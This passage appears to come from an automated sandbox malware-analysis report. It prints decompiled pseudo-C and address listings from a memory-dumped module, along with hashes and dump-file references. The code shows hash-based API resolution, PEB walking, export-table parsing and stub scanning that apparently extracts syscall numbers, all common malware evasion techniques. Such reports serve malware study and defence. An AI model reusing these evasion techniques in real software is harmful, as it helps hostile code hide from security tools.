								__eflags = _t446 - 0xffffffff;
								if(_t446 == 0xffffffff) {
									goto L29;
								} else {
								}
							}
							L32:
							_t325 = _t325 + 1;
							__eflags = _t325 -  *(_t458 + 0x20);
						} while (_t325 <  *(_t458 + 0x20));
					}
					E7331F6F0(_t458 + 0x24);
					_t173 =  *(_t458 + 4);
					__eflags = _t173[0xb];
					if(_t173[0xb] != 0) {
						_t432 =  *_t173;
						__eflags = _t432;
						if(_t432 > 0) {
							_t435 = 0;
							__eflags = 0;
							_t324 =  &(_t173[1]);
							while(1) {
								_t441 = _t435 * 4;
								_t217 = E7331F558(_t324, _t441);
								_t218 =  *(_t458 + 4);
								__eflags =  *_t217 -  *((intOrPtr*)(_t218 + 0x30));
								if( *_t217 ==  *((intOrPtr*)(_t218 + 0x30))) {
									break;
								}
								_t435 = _t435 + 1;
								__eflags = _t435 - _t432;
								if(_t435 < _t432) {
									continue;
								}
								goto L46;
							}
							__eflags = _t435 - 0xffffffff;
							if(_t435 != 0xffffffff) {
								_t219 = E7331F568( *_t458);
								__eflags = _t219 - _t441;
								if(_t219 > _t441) {
									 *((intOrPtr*)(_t458 + 0x74)) = 4 + _t435 * 4;
									_t247 = E7331F568( *_t458);
									__eflags = _t247 -  *((intOrPtr*)(_t458 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t458 + 0x74))) {
										 *((intOrPtr*)(_t458 + 0x90)) = E7331F558( *(_t458 + 4), _t441);
										 *((intOrPtr*)(_t458 + 0x8c)) = E7331F558( *(_t458 + 4),  *((intOrPtr*)(_t458 + 0x74)));
										E7332382C( *((intOrPtr*)(_t458 + 0x98)),  *((intOrPtr*)(_t458 + 0x90)), E7331F568( *_t458) -  *((intOrPtr*)(_t458 + 0x74)));
										_t458 = _t458 + 0xc;
									}
									E7331F8C4( *(_t458 + 4), E7331F568( *_t458) + 0xfffffffc);
									_t424 =  *(_t458 + 4);
									_t75 = _t424 + 0x18;
									 *_t75 =  *(_t424 + 0x18) - 1;
									__eflags =  *_t75;
								}
								_t220 = E7331F568(_t324);
								__eflags = _t220 - _t441;
								if(_t220 > _t441) {
									_t435 = 4 + _t435 * 4;
									_t237 = E7331F568(_t324);
									__eflags = _t237 - _t435;
									if(_t237 > _t435) {
										_t238 = E7331F558(_t324, _t441);
										 *((intOrPtr*)(_t458 + 0x94)) = E7331F558(_t324, _t435);
										E7332382C(_t238,  *((intOrPtr*)(_t458 + 0x98)), E7331F568(_t324) - _t435);
										_t458 = _t458 + 0xc;
									}
									E7331F8C4(_t324, E7331F568(_t324) + 0xfffffffc);
									_t246 =  *(_t458 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E7331F8C4( *(_t458 + 4), E7331F568( *_t458) + 4);
								 *(E7331F558( *(_t458 + 4), E7331F568( *_t458) + 0xfffffffc)) =  *( *(_t458 + 4) + 0x2c);
								 *((intOrPtr*)( *(_t458 + 4) + 0x18)) =  *((intOrPtr*)( *(_t458 + 4) + 0x18)) + 1;
								E7331F8C4(_t324, E7331F568(_t324) + 4);
								 *((intOrPtr*)(E7331F558(_t324, E7331F568(_t324) + 0xfffffffc))) =  *((intOrPtr*)( *(_t458 + 4) + 0x30));
								 *( *(_t458 + 4)) =  *( *(_t458 + 4)) + 1;
							}
						}
					}
					L46:
					 *((intOrPtr*)(_t458 + 8)) = 0;
					 *((intOrPtr*)(_t458 + 0xc)) = 0;
					E7331F620(_t458 + 0x14, 0);
					 *((intOrPtr*)(_t458 + 0x34)) =  *((intOrPtr*)(_t458 + 0x68));
					 *((intOrPtr*)(_t458 + 0x38)) = 0;
					E7331F620(_t458 + 0x40, 0);
					_t178 =  *(_t458 + 4);
					_t416 = 0x40;
					__eflags =  *((intOrPtr*)(_t178 + 0x18)) - 0x40;
					_t417 =  <  ?  *((void*)(_t178 + 0x18)) : _t416;
					 *(_t458 + 0x80) = _t417;
					__eflags = _t417;
					if(_t417 <= 0) {
						L57:
						_t415 = E7331F558(_t458 + 0x14, 0);
						_t180 = E73322878( *((intOrPtr*)(_t458 + 0xc)), _t179, 0x3e8);
						_t132 = _t180 - 0x80; // -128
						_t181 = _t132;
						__eflags = _t181 - 0x3f;
						_t316 =  <=  ? _t181 : _t180;
						__eflags = _t316 - 0x102;
						if(_t316 == 0x102) {
							goto L59;
						} else {
							__eflags = _t316 - 0x3f;
							if(_t316 <= 0x3f) {
								__eflags = _t316 << 2;
								 *((intOrPtr*)( *((intOrPtr*)(_t458 + 8)) + 0x2c)) =  *((intOrPtr*)(E7331F558( *(_t458 + 4), _t316 << 2)));
								_t188 = E7331F558( *(_t458 + 0x7c), _t316 << 2);
								_t415 =  *(_t458 + 4);
								 *((intOrPtr*)(_t415 + 0x30)) =  *_t188;
								_t318 =  *((intOrPtr*)(_t415 + 0x2c));
								E7331B680(_t458 + 0x34);
								E7331B680(_t458 + 8);
							} else {
								goto L59;
							}
						}
						goto L62;
					} else {
						_t454 = 0;
						__eflags = 0;
						while(1) {
							E7331CB48(_t458 + 0x4c);
							_t415 = 0;
							_t345 = _t458 + 0x4c;
							 *((char*)(_t345 + 4)) = 0;
							 *((intOrPtr*)(_t345 + 0x20)) = 0;
							__eflags = E7331C33C(_t345);
							if(__eflags != 0) {
								break;
							}
							E7331F8C4(_t458 + 0x14, E7331F568(_t458 + 0x10) + 4);
							 *((intOrPtr*)(E7331F558(_t458 + 0x14, E7331F568(_t458 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t458 + 0x4c));
							 *((intOrPtr*)(_t458 + 0xc)) =  *((intOrPtr*)(_t458 + 0xc)) + 1;
							_t202 = E73322F8C(0xa5eabdf8, 0xf3119fba);
							__eflags = _t202;
							if(_t202 == 0) {
								_t415 =  *(_t458 + 0x6c);
								__eflags = _t415;
								if(__eflags == 0) {
									break;
								} else {
									__eflags = _t415 - 0xffffffff;
									if(__eflags != 0) {
										E7331F8C4(_t458 + 0x40, E7331F568(_t458 + 0x3c) + 4);
										 *(E7331F558(_t458 + 0x40, E7331F568(_t458 + 0x3c) + 0xfffffffc)) =  *(_t458 + 0x6c);
										 *((intOrPtr*)(_t458 + 0x4c - 0x14)) =  *((intOrPtr*)(_t458 + 0x4c - 0x14)) + 1;
										E7331CDE0(_t458 + 0x4c, __eflags);
										_t454 = _t454 + 1;
										__eflags = _t454 -  *(_t458 + 0x80);
										if(_t454 <  *(_t458 + 0x80)) {
											continue;
										} else {
											_t437 = 0;
											__eflags = 0;
											do {
												_t211 = E7331F558( *(_t458 + 4), _t437 * 4);
												_t212 = E7331F558(_t458 + 0x40, _t437 * 4);
												E73318C14( *_t211, E7332034C(0xa5eabdf8, 0x4145240a),  *_t212, 0, 0);
												_t437 = _t437 + 1;
												__eflags = _t437 -  *(_t458 + 0x80);
											} while (_t437 <  *(_t458 + 0x80));
											goto L57;
										}
									} else {
										break;
									}
								}
							} else {
								__eflags = 0;
								_push(2);
								_push(0);
								_push(0);
								_push(_t458 + 0x6c);
								_push( *((intOrPtr*)(_t458 + 0x78)));
								_push( *((intOrPtr*)(_t458 + 0x60)));
								_push(0xffffffff);
								asm("int3");
								return _t202;
							}
							goto L71;
						}
						E7331CDE0(_t458 + 0x4c, __eflags);
						L59:
						E7331B680(_t458 + 0x34);
						E7331B680(_t458 + 8);
						goto L60;
					}
					goto L71;
				}
			}

0x733184e4
0x733184e8
0x733184f1
0x733184f7
0x733184fb
0x733184ff
0x7331850a
0x7331850e
0x73318513
0x7331851b
0x7331852b
0x00000000
0x7331852d
0x73318535
0x7331853c
0x7331853c
0x73318a8f
0x73318a91
0x73318ad2
0x73318ad4
0x73318ae3
0x73318aef
0x73318ad6
0x73318ade
0x73318af5
0x73318afa
0x00000000
0x73318ae0
0x73318ae2
0x00000000
0x73318ae2
0x73318ade
0x00000000
0x73318546
0x7331854a
0x7331854d
0x73318553
0x73318553
0x73318555
0x7331855c
0x7331856a
0x7331856c
0x73318570
0x73318572
0x7331859e
0x733185a2
0x733185a7
0x733185ac
0x733185b0
0x733185b4
0x733185bb
0x733185c0
0x733185c2
0x73318b51
0x73318b60
0x73318b7f
0x73318b84
0x73318b84
0x733185d5
0x733185da
0x733185de
0x733185de
0x733185de
0x733185ef
0x733185f1
0x733185f3
0x73318604
0x73318604
0x73318609
0x7331860e
0x73318612
0x73318617
0x7331861e
0x73318623
0x73318625
0x73318b13
0x73318b1f
0x73318b39
0x73318b3e
0x73318b3e
0x7331863b
0x73318640
0x73318644
0x73318644
0x73318644
0x73318644
0x73318647
0x73318647
0x73318574
0x73318576
0x73318576
0x73318578
0x73318584
0x7331858b
0x7331858d
0x00000000
0x00000000
0x73318599
0x7331859a
0x7331859c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x7331859c
0x7331858f
0x73318592
0x00000000
0x00000000
0x73318594
0x73318592
0x73318648
0x7331864c
0x7331864d
0x7331864d
0x73318555
0x73318655
0x7331865a
0x73318660
0x73318660
0x73318662
0x73318669
0x73318677
0x73318679
0x7331867d
0x7331867f
0x73318681
0x733186bc
0x733186cb
0x733186cd
0x733186cf
0x733186ed
0x733186ef
0x733186f1
0x73318703
0x73318721
0x7331872a
0x7331872d
0x7331873b
0x7331874c
0x7331876a
0x7331876c
0x73318770
0x73318770
0x73318770
0x733186f1
0x73318683
0x73318687
0x73318687
0x7331868c
0x73318693
0x733186a2
0x733186a9
0x733186ab
0x00000000
0x00000000
0x733186b7
0x733186b8
0x733186ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x733186ba
0x733186ad
0x733186b0
0x00000000
0x00000000
0x733186b2
0x733186b0
0x73318772
0x73318772
0x73318773
0x73318773
0x73318662
0x73318781
0x73318786
0x7331878a
0x7331878e
0x73318794
0x73318796
0x73318798
0x733187a2
0x733187a2
0x733187a4
0x733187a7
0x733187a9
0x733187b1
0x733187b8
0x733187bc
0x733187bf
0x00000000
0x00000000
0x733188bb
0x733188bc
0x733188be
0x00000000
0x00000000
0x00000000
0x733188be
0x733187c5
0x733187c8
0x733187d1
0x733187d6
0x733187d8
0x733187e4
0x733187e8
0x733187ed
0x733187f1
0x73318bce
0x73318be2
0x73318c04
0x73318c09
0x73318c09
0x73318807
0x7331880c
0x73318810
0x73318810
0x73318810
0x73318810
0x73318815
0x7331881a
0x7331881c
0x73318820
0x73318827
0x7331882c
0x7331882e
0x73318b8f
0x73318b9e
0x73318bb7
0x73318bbc
0x73318bbc
0x73318841
0x73318846
0x7331884a
0x7331884a
0x7331884a
0x7331885c
0x7331887d
0x73318885
0x73318893
0x733188b1
0x733188b7
0x733188b7
0x733187c8
0x73318798
0x733188c4
0x733188c6
0x733188ca
0x733188d3
0x733188de
0x733188e2
0x733188eb
0x733188f0
0x733188f6
0x733188f7
0x733188fb
0x733188ff
0x73318906
0x73318908
0x73318a48
0x73318a59
0x73318a60
0x73318a67
0x73318a67
0x73318a6a
0x73318a6d
0x73318a70
0x73318a76
0x00000000
0x73318a78
0x73318a78
0x73318a7b
0x73318a94
0x73318aac
0x73318aaf
0x73318ab4
0x73318abe
0x73318ac1
0x73318ac4
0x73318acd
0x00000000
0x00000000
0x00000000
0x73318a7b
0x00000000
0x7331890e
0x73318910
0x73318910
0x73318912
0x73318916
0x7331891b
0x7331891d
0x73318921
0x73318924
0x7331892c
0x7331892e
0x00000000
0x00000000
0x73318945
0x73318960
0x73318962
0x73318970
0x73318975
0x73318977
0x73318994
0x73318998
0x7331899a
0x00000000
0x7331899c
0x7331899c
0x7331899f
0x733189c0
0x733189df
0x733189e5
0x733189e8
0x733189ed
0x733189ee
0x733189f5
0x00000000
0x733189fb
0x733189fd
0x733189fd
0x733189ff
0x73318a0b
0x73318a17
0x73318a39
0x73318a3e
0x73318a3f
0x73318a3f
0x00000000
0x733189ff
0x00000000
0x00000000
0x00000000
0x7331899f
0x73318979
0x73318979
0x7331897f
0x73318981
0x73318982
0x73318983
0x73318984
0x73318988
0x7331898c
0x7331898e
0x7331898f
0x7331898f
0x00000000
0x73318977
0x733189a5
0x73318a7d
0x73318a81
0x73318a8a
0x00000000
0x73318a8a
0x00000000
0x73318908

Strings

, xrefs: 73318AD6

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
Instruction ID: c8f03636c12770aa5600b66a6c838961f7edb31ee30b4354b3ce35015059c8c3
Opcode Fuzzy Hash: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
Instruction Fuzzy Hash: 7A12A7719057469FD728DF24C980B6EB7F5EF85311F104A2DE6AA8B2A4DB30DC16CB42

Uniqueness

Uniqueness Score: -1.00%

Function 733214D8, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E733214D8(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E733203A0(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x7332d208 == 0 ||  *0x7332d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0x212ae3b8;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E73324BE0( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x7332d2ec |  *0x7332d2ed;
									if(( *0x7332d2ec |  *0x7332d2ed) == 0) {
										_t525 =  *0x7332d208; // 0x46b1340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x7332d2ec = 1;
											_t526 = E73323558(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E73321CCC(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x7332d208 = _t526;
											 *0x7332d2ec = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E73323558(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E73321CCC(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E7331E070(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E7331E070(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0xd926c223;
									if(_t535[0x54] == 0xd926c223) {
										 *0x7332d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x80febacc;
										if(_t535[0x54] == 0x80febacc) {
											 *0x7332d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E7331E94C( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E73322F94(0xa5eabdf8, 0x9766f056, 0xa5eabdf8, 0xa5eabdf8);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x7332d2e4 = 1;
					E7331F620( &(_t535[0x38]), 0);
					E7331F620( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E7331F558( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E73322F94(0xa5eabdf8, 0x22dc1034, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E7331F8C4( &(_t535[0xc]), E7331F568( &(_t535[8])) + 0x14);
								_t369 = E7331F558( &(_t535[0xc]), E7331F568( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E7331F6F0( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E7331F620( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E7331F6F0( &(_t535[8]));
							E7331F6F0( &(_t535[0x164]));
							E7331F620( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E7331F620( &(_t535[0x20]), 0);
							_push(0xa5eabdf8);
							_t289 = E73321DD0(0xa5eabdf8);
							_t290 = E73321388( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E73321D08( &(_t535[0x164]), 0xa5eabdf8);
							_t518 =  &(_t535[0x178]);
							E7331D0D0( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E73325C40( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E73325C74( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E73328D74( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E7331F6F0( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E7331BC00( &(_t535[0x110]));
							}
							E7331D098( &(_t535[0x104]));
							E7331D098(_t518);
							E7331D098( &(_t535[0x15c]));
							E7331D098( &(_t535[0x154]));
							E73329058( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E7331F6B4( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E7332901C( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E7331F558( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E7331F568( &(_t535[0x44]));
								_t519 =  *(0x7332bce0 + _t381 * 4);
								_t531 = E73328FE8( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E73328754( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E7331F568( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E7331F578( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E7331F568( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E7331F8C4( &(_t535[0x20]), E7331F568( &(_t535[0x1c])) + 8);
										E7331F558( &(_t535[0x20]), E7331F568( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E733230A4(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E7331F8C4( &(_t535[0x48]), _t535[0x70]);
									E733230A4(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E7331F8DC( &(_t535[0x44]), _t563);
									E7331F8DC( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E733290A8( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E73329070( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E7331F6F0( &(_t535[0x144]));
									E7331F6F0( &(_t535[0x134]));
									goto L38;
								}
								 *0x7332d2e8 =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E7331F6F0( &(_t535[0x11c]));
							E73328DD4(_t381,  &(_t535[0xd8]));
							E7331F6F0( &(_t535[0x1c]));
							E7331F6F0( &(_t535[0x44]));
							E7331F6F0( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E7331F558( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E7331F8C4( &(_t535[0x38]), E7331F568( &(_t535[0x34])) + 0x14);
							_t347 = E7331F558( &(_t535[0x38]), E7331F568( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E7331F558( &(_t535[0xc]), _t62);
						_t455 = E7331F558( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x733214e4
0x733214eb
0x733214ee
0x733214f5
0x73321c77
0x73321c77
0x733214fb
0x73321506
0x73321a45
0x73321a49
0x00000000
0x73321cc8
0x73321a4f
0x73321a52
0x73321a55
0x73321a5f
0x73321a6e
0x73321a70
0x73321a77
0x73321c61
0x73321c63
0x73321c66
0x73321c6a
0x00000000
0x73321c6a
0x73321a86
0x73321a91
0x73321a98
0x73321a9b
0x73321a9d
0x73321aa0
0x73321aa3
0x73321aa9
0x73321ab7
0x73321ac7
0x73321aec
0x73321afd
0x73321b00
0x73321b02
0x73321b66
0x73321b69
0x73321b69
0x73321b6b
0x73321b6e
0x73321b72
0x73321b72
0x73321b76
0x00000000
0x00000000
0x73321b83
0x73321b89
0x73321bbd
0x73321bc3
0x73321bc5
0x73321c94
0x73321c9c
0x73321c9f
0x73321ca1
0x73321cb8
0x73321cb8
0x73321ca3
0x73321ca7
0x73321cac
0x73321cac
0x73321cba
0x73321cc0
0x73321bdf
0x73321bdf
0x73321be1
0x73321be1
0x73321be3
0x73321be3
0x73321be8
0x00000000
0x00000000
0x73321bea
0x73321beb
0x73321bee
0x73321bf1
0x00000000
0x00000000
0x73321bfd
0x73321c00
0x73321c02
0x73321c19
0x73321c19
0x73321c04
0x73321c08
0x73321c0d
0x73321c0d
0x73321c26
0x73321c29
0x73321c32
0x73321c35
0x73321c58
0x73321c5c
0x00000000
0x73321c5c
0x73321c3d
0x73321c3d
0x73321c49
0x73321c4c
0x73321c55
0x00000000
0x73321c55
0x73321bcb
0x73321bdb
0x73321bdb
0x73321bdd
0x00000000
0x00000000
0x73321bd3
0x73321bd5
0x73321bd5
0x00000000
0x73321bdb
0x73321b8b
0x73321b93
0x73321bb3
0x73321b95
0x73321b95
0x73321b9d
0x73321ba6
0x73321ba6
0x73321b9d
0x00000000
0x73321b93
0x73321b04
0x73321b0b
